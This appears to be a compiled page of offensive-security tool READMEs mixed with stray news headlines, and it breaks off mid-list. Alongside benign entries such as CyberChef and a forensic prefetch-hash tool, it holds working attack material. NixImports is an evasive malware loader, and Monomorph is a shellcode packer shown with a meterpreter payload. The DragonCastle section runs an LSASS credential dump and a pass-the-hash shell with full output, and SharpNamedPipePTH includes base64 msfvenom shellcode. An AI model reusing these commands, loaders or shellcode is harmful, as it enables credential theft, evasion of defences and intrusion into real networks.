CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.

Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

Containers

If you would like to try out CyberChef locally you can either build it yourself:

docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef

Or you can use our image directly:

docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

This image is built and published through our GitHub Workflows

How it works

There are four main areas in CyberChef:

1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
2. The output box in the bottom right, where the outcome of your processing will be displayed.
3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like in simple or complex ways. Some examples are as follows:

• Decode a Base64-encoded string
• Convert a date and time to a different time zone
• Parse a Teredo IPv6 address
• Convert data from a hexdump, then decompress
• Decrypt and disassemble shellcode
• Display multiple timestamps as full dates
• Carry out different operations on data of different types
• Use parts of the input as arguments to operations
• Perform AES decryption, extracting the IV from the beginning of the cipher stream
• Automagically detect several layers of nested encoding

Features

• Drag and drop
  • Operations can be dragged in and out of the recipe list, or reorganised.
  • Files up to 2GB can be dragged over the input box to load them directly into the browser.
• Auto Bake
  • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
  • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
• Automated encoding detection
  • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.
• Breakpoints
  • You can set breakpoints on any operation in your recipe to pause execution before running it.
  • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
• Save and load recipes
  • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
  • You can also copy the URL, which includes your recipe and input, to easily share it with others.
• Search
  • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
• Highlighting
  • When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively (example: highlight the word 'question' in the input to see where it appears in the output).
• Save to file and load from file
  • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
• CyberChef is entirely client-side
  • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
  • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

Deep linking

By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

Supported arguments are recipe, input (encoded in Base64), and theme.

Browser support

CyberChef is built to support

• Google Chrome 50+
• Mozilla Firefox 38+

Node.js support

CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

Contributing

Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

• Push your changes to your fork.
• Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.

NixImports - A .NET Malware Loader, Using API-Hashing To Evade Static Analysis

A .NET malware loader, using API-Hashing and dynamic invoking to evade static analysis

How does it work?

NixImports uses my managed API-Hashing implementation HInvoke, to dynamically resolve most of it's called functions at runtime. To resolve the functions HInvoke requires two hashes the typeHash and the methodHash. These hashes represent the type name and the methods FullName, on runtime HInvoke parses the entire mscorlib to find the matching type and method. Due to this process, HInvoke does not leave any import references to the methods called trough it.

Another interesting feature of NixImports is that it avoids calling known methods as much as possible, whenever applicable NixImports uses internal methods instead of their wrappers. By using internal methods only we can evade basic hooks and monitoring employed by some security tools.

For a more detailed explanation checkout my blog post.

You can generate hashes for HInvoke using this tool

How to use

NixImports only requires a filepath to the .NET binary you want to pack with it.

NixImports.exe <filepath>

It will automatically generate a new executable called Loader.exe in it's root folder. The loader executable will contain your encoded payload and the stub code required to run it.

Tips for Defenders

If youre interested in detection engineering and possible detection of NixImports, checkout the last section of my blog post

Or click here for a basic yara rule covering NixImports.

PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool

This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!

How Passmute can also help to secure our passwords more?

PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

The transformation rules include:

reverse: reverses the password string

uppercase: converts the password to uppercase letters

lowercase: converts the password to lowercase letters

swapcase: swaps the case of each letter in the password

capitalize: capitalizes the first letter of the password

leet: replaces some letters in the password with their leet equivalents

strip: removes all whitespace characters from the password

The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.

Installation

git clone https://HITH-Hackerinthehouse/PassMute.git

cd PassMute

chmod +x PassMute.py

Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

Here's a brief explanation of the available options:

-h or --help: shows the help message and exits

-f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

-r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

-v or --verbose: prints verbose output for each password transformation

-p (PASSWORD) or --password (PASSWORD): transforms a single password

-o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

-t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

--max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse

Examples

Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:

Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.

Legal Disclaimer:

You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.

Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
    ════════════════════════════════════╦═══    
     ╔═╦═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╦═╗ ╔═╗ ╔══╔═╗ ╠═╗     
    ═╩ ╩ ╩═╚═╝═╩ ╩═╚═╝═╩ ╩ ╩═╚═╝═╩  ╠═╝═╩ ╩═    
    ════════════════════════════════╩═══════    
                                  By Retr0id    

    ═══ MD5-Monomorphic Shellcode Packer ═   ══    


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.

GoTo admits: Customer cloud backups stolen together with decryption key

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.

Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
		DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password (if omitted, it will be asked unless -no-pass)
  -d DOMAIN, --domain DOMAIN
                        valid doma   in name
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes (LM hash can be empty)
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
  -local-dll dll to plant
                        DLL location (local) that will be planted on target
  -remote-dll dll location
                        Path used to update AutodialDLL registry value</   pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
		DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

		============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977   b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 

		============
[+] Deleting DLL

[^] Have a nice day!

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                            Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivile   ge                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               En   able computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernández (@TheXC3LL)

References

• https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
• https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
• https://adepts.of0x.cc/physical-graffiti-lsass/
• https://blog.xpnsec.com/exploring-mimikatz-part-2/

Goodbye SHA-1: NIST Retires 27-Year-Old Widely Used Cryptographic Algorithm

Serious Security: MD5 considered harmful – to the tune of $600,000

Prefetch-Hash-Cracker - A Small Util To Brute-Force Prefetch Hashes

Motivation

During the forensic analysis of a Windows machine, you may find the name of a deleted prefetch file. While its content may not be recoverable, the filename itself is often enough to find the full path of the executable for which the prefetch file was created.

Using the tool

The following fields must be provided:

• Executable name
  Including the extension. It will be embedded in the prefetch filename, unless this happens.

• Prefetch hash
  8 hexadecimal digits at the end of the prefetch filename, right before the .pf extension.

• Hash function

• Bodyfile

• Mount point

Hash function

There are 3 known prefetch hash functions:

• SCCA XP
  Used in Windows XP

• SCCA Vista
  Used in Windows Vista and Windows 10

• SCCA 2008
  Used in Windows 7, Windows 8 and Windows 8.1

Bodyfile

A bodyfile of the volume the executable was executed from.

The bodyfile format is not very restrictive, so there are a lot of variations of it - some of which are not supported. Body files created with fls and MFTECmd should work fine.

Mount point

The mount point of the bodyfile, as underlined below:

0|C:/Users/Peter/Desktop ($FILE_NAME)|62694-48-2|d/d-wx-wx-wx|...

How does it work?

The provided bodyfile is used to get the path of every folder on the volume. The tool appends the provided executable name to each of those paths to create a list of possible full paths for the executable. Each possible full path is then hashed using the provided hash function. If there's a possible full path for which the result matches the provided hash, that path is outputted.

Limitations

The following cases are not supported:

• Hosting applications, such as svchost.exe and mmc.exe
• Applications executed with the /prefetch:# flag
• Applications executed from a UNC (network) path

The 29-character limit

If the executable name is longer than 29 characters (including the extension), it will be truncated in the prefetch filename. For example, executing this file:

This is a very long file nameSo this part will be truncated.exe

From the C:\Temp directory on a Windows 10 machine, will result in the creation of this prefetch file:

THIS IS A VERY LONG FILE NAME-D0B882CC.pf

In this case, the executable name cannot be derived from the prefetch filename, so you will not be able to provide it to the tool.

License

MIT

Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.

Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
	{'a' : '@'},
	{'b' : '8'},
	{'e' : '3'},
	{'g' : ['9', '6']},
	{'i' : ['1', '!']},
	{'o' : '0'},
	{'s' : ['$', '5']},
	{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.

SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation

This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this. There is a blog post for explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation.

My personal goals for a tool/technique were:

• Fully featured shell or C2-connection as the victim user-account
• It must to able to also Impersonate low privileged accounts - depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others
• The tool can be used as C2-module

The impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it's currently spawning notepad as the impersonated user and injects shellcode into that new process via D/Invoke CreateRemoteThread Syscall. I'm still looking for possibility to spawn a process in the background or execute shellcode without having a process of the target user for memory allocation.

Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security

A curated list of awesome tools, research, papers and other projects related to password cracking and password security.

Read the guidelines before contributing! In short:

• List is alphabetically sorted
• If in doubt, use awesome-lint
• If you think an item shouldn't be here open an issue

Books

• Hash Crack: Password Cracking Manual (v3) - Password Cracking Manual v3 is an expanded reference guide for password recovery (cracking) methods, tools, and analysis techniques.

Cloud

• Cloud_crack - Crack passwords using Terraform and AWS.
• Cloudcat - A script to automate the creation of cloud infrastructure for hash cracking.
• Cloudstomp - Automated deployment of instances on EC2 via plugin for high CPU/GPU applications at the lowest price.
• Cloudtopolis - A tool that facilitates the installation and provisioning of Hashtopolis on the Google Cloud Shell platform, quickly and completely unattended (and also, free!).
• NPK - NPK is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3.
• Penglab - Abuse of Google Colab for cracking hashes.
• Rook - Automates the creation of AWS p3 instances for use in GPU-based password cracking.

Conversion

• 7z2hashcat - Extract information from password-protected .7z archives (and .sfx files) such that you can crack these "hashes" with hashcat.
• MacinHash - Convert macOS plist password file to hash file for password crackers.
• NetNTLM-Hashcat - Converts John The Ripper/Cain format hashes (singular, or in bulk) to HashCat compatible hash format.
• Rubeus-to-Hashcat - Converts / formats Rubeus kerberoasting output into hashcat readable format.
• WINHELLO2hashcat - With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat.
• bitwarden2hashcat - A tool that converts Bitwarden's data into a hashcat-suitable hash.
• hc_to_7z - Convert 7-Zip hashcat hashes back to 7z archives.
• hcxtools - Portable solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats.
• itunes_backup2hashcat - Extract the information needed from the Manifest.plist files to convert it to hashes compatible with hashcat.
• mongodb2hashcat - Extract hashes from the MongoDB database server to a hash format that hashcat accepts: -m 24100 (SCRAM-SHA-1) or -m 24200 (SCRAM-SHA-256).

Hashcat

Hashcat is the "World's fastest and most advanced password recovery utility." The following are projects directly related to Hashcat in one way or another.

• Autocrack - A set of client and server tools for automatically, and lightly automatically cracking hashes.
• docker-hashcat - Latest hashcat docker for Ubuntu 18.04 CUDA, OpenCL, and POCL.
• Hashcat-Stuffs - Collection of hashcat lists and things.
• hashcat-utils - Small utilities that are useful in advanced password cracking.
• Hashfilter - Read a hashcat potfile and parse different types into a sqlite database.
• known_hosts-hashcat - A guide and tool for cracking ssh known_hosts files with hashcat.
• pyhashcat - Python C API binding to libhashcat.

Automation

• autocrack - Hashcat wrapper to help automate the cracking process.
• hashcat.launcher - A cross-platform app that run and control hashcat.
• hat - An Automated Hashcat Tool for common wordlists and rules to speed up the process of cracking hashes during engagements.
• hate_crack - A tool for automating cracking methodologies through Hashcat from the TrustedSec team.
• Naive hashcat - Naive hashcat is a plug-and-play script that is pre-configured with naive, emperically-tested, "good enough" parameters/attack types.

Distributed cracking

• CrackLord - Queue and resource system for cracking passwords.
• fitcrack - A hashcat-based distributed password cracking system.
• Hashtopolis - A multi-platform client-server tool for distributing hashcat tasks to multiple computers.
• Kraken - A multi-platform distributed brute-force password cracking system.

Rules

• clem9669 rules - Rule for hashcat or john.
• hashcat rules collection - Probably the largest collection of hashcat rules out there.
• Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
• Kaonashi - Wordlist, rules and masks from Kaonashi project (RootedCON 2019).
• nsa-rules - Password cracking rules and masks for hashcat generated from cracked passwords.
• nyxgeek-rules - Custom password cracking rules for Hashcat and John the Ripper.
• OneRuleToRuleThemAll - "One rule to crack all passwords. or atleast we hope so."
• pantagrule - Large hashcat rulesets generated from real-world compromised passwords.

Rule tools

• duprule - Detect & filter duplicate hashcat rules.

Web interfaces

• crackerjack - CrackerJack is a Web GUI for Hashcat developed in Python.
• CrackQ - A Python Hashcat cracking queue system.
• hashpass - Hash cracking WebApp & Server for hashcat.
• Hashview - A web front-end for password cracking and analytics.
• Wavecrack - Wavestone's web interface for password cracking with hashcat.
• WebHashCat - WebHashcat is a very simple but efficient web interface for hashcat password cracking tool.

John the Ripper

John the Ripper is "an Open Source password security auditing and password recovery tool available for many operating systems." The following are projects directly related to John the Ripper in one way or another.

• BitCracker - BitCracker is the first open source password cracking tool for memory units encrypted with BitLocker.
• johnny - GUI frontend to John the Ripper.

Misc

• hashID - Software to identify the different types of hashes.
• Name That Hash - Don't know what type of hash it is? Name That Hash will name that hash type! Identify MD5, SHA256 and 300+ other hashes. Comes with a neat web app.

Websites

Communities

• hashcat Forum - Forum by the developers of hashcat.
• Hashmob - A growing password recovery community aimed towards being a center point of collaboration for cryptography enthusiasts.
• Hashkiller Forum - A password cracking forum with over 20,000 registered users.

Lookup services

• CMD5 - Provides online MD5 / sha1/ mysql / sha256 encryption and decryption services.
• CrackStation - Free hash lookup service supplying wordlists as well.
• Hashes.com - A hash lookup service with paid features.
• Hashkiller - A hash lookup service with a forum.
• Online Hash Crack - Cloud password recovery service.

Wordlist tools

Tools for analyzing, generating and manipulating wordlists.

Analysis

• PACK - A collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics.
• pcfg_cracker - This project uses machine learning to identify password creation habits of users.
• Pipal - THE password analyser.

Generation/Manipulation

• common-substr - Simple tool to extract the most common substrings from an input text. Built for password cracking.
• Crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.
• CUPP - A tool that lets you generate wordlists by user profiling data such as birthday, nickname, address, name of a pet or relative etc.
• duplicut - Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking).
• Gorilla - Tool for generating wordlists or extending an existing one using mutations.
• Keyboard-Walk-Generators - Generate Keyboard Walk Dictionaries for cracking.
• kwprocessor - Advanced keyboard-walk generator with configureable basechars, keymap and routes.
• maskprocessor - High-performance word generator with a per-position configureable charset.
• maskuni - A standalone fast word generator in the spirit of hashcat's mask generator with unicode support.
• Mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
• Phraser - Phraser is a phrase generator using n-grams and Markov chains to generate phrases for passphrase cracking.
• princeprocessor - Standalone password candidate generator using the PRINCE algorithm.
• Rephraser - A Python-based reimagining of Phraser using Markov-chains for linguistically-correct password cracking.
• Rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli found in hashcat utilities.
• statsprocessor - Word generator based on per-position markov-chains.
• TTPassGen - Flexible and scriptable password dictionary generator which supportss brute-force, combination, complex rule modes etc.
• token-reverser - Words list generator to crack security tokens.
• WikiRaider - WikiRaider enables you to generate wordlists based on country specific databases of Wikipedia.

Wordlists

Laguage specific

• Albanian wordlist - A mix of names, last names and some albanian literature.
• Danish Phone Wordlist Generator - This tool can generate wordlists of Danish phone numbers by area and/or usage (Mobile, landline etc.) Useful for password cracking or fuzzing Danish targets.
• Danish Wordlists - Collection of danish wordlists for cracking danish passwords.
• French Wordlists - This project aim to provide french word list about everything a person could use as a base password.

Other

• Packet Storm Wordlists - A substantial collection of different wordlists in multiple languages.
• Rocktastic - Includes many permutations of passwords and patterns that have been observed in the wild.
• RockYou2021 - RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists.
• WeakPass - Collection of large wordlists.

Specific file formats

PDF

• pdfrip - A multi-threaded PDF password cracking utility equipped with commonly encountered password format builders and dictionary attacks.

PEM

• pemcracker - Tool to crack encrypted PEM files.

JKS

